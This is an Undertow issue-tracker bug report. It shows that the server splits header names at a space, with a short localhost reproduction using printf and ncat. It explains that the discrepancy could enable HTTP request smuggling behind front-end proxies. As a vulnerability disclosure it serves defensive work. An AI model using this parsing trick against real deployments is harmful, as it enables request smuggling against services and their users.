Uploaded image for project: 'Undertow'
  1. Undertow
  2. UNDERTOW-2594

Undertow splits header names from values on spaces

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Unresolved
    • Icon: Major Major
    • None
    • None
    • Core
    • None
    • Hide

      1. Start up an Undertow-based web server that echoes received headers, such as this one: https://github.com/narfindustries/http-garden/blob/main/images/undertow/GardenServer.java
      2. Send it a request with a space in a header name, and observe the effect:

      printf 'GET / HTTP/1.1\r\nHost: whatever\r\nthis is a: test\r\n\r\n' | \
      ncat localhost 80 | \
      grep "headers" | \
      jq '.headers[0][0]' | \
      xargs echo | \
      base64 -d | \
      od -tcx1

      0000000 t h i s
      74 68 69 73
      0000004

      Note that the decoded header name is "this". That's a problem because from the perspective of an upstream proxy that forwards spaces in header names (like AWS CloudFront), the header name is "this is a". This discrepancy can be used on framing-related headers for request smuggling.

      Show
      1. Start up an Undertow-based web server that echoes received headers, such as this one: https://github.com/narfindustries/http-garden/blob/main/images/undertow/GardenServer.java 2. Send it a request with a space in a header name, and observe the effect: printf 'GET / HTTP/1.1\r\nHost: whatever\r\nthis is a: test\r\n\r\n' | \ ncat localhost 80 | \ grep "headers" | \ jq '.headers [0] [0] ' | \ xargs echo | \ base64 -d | \ od -tcx1 0000000 t h i s 74 68 69 73 0000004 Note that the decoded header name is "this". That's a problem because from the perspective of an upstream proxy that forwards spaces in header names (like AWS CloudFront), the header name is "this is a". This discrepancy can be used on framing-related headers for request smuggling.

      Undertow splits header names from values on either space or colon, whichever comes first. This allows for the construction of crafted requests with headers that are visible only to Undertow, but not upstream proxies, which can be used to launch request smuggling attacks.

       

      (I reported this to the security list in March, but the issue was closed without a substantive response.)

              ropalka Richard Opalka
              kenballus Ben Kallus
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

                Created:
                Updated: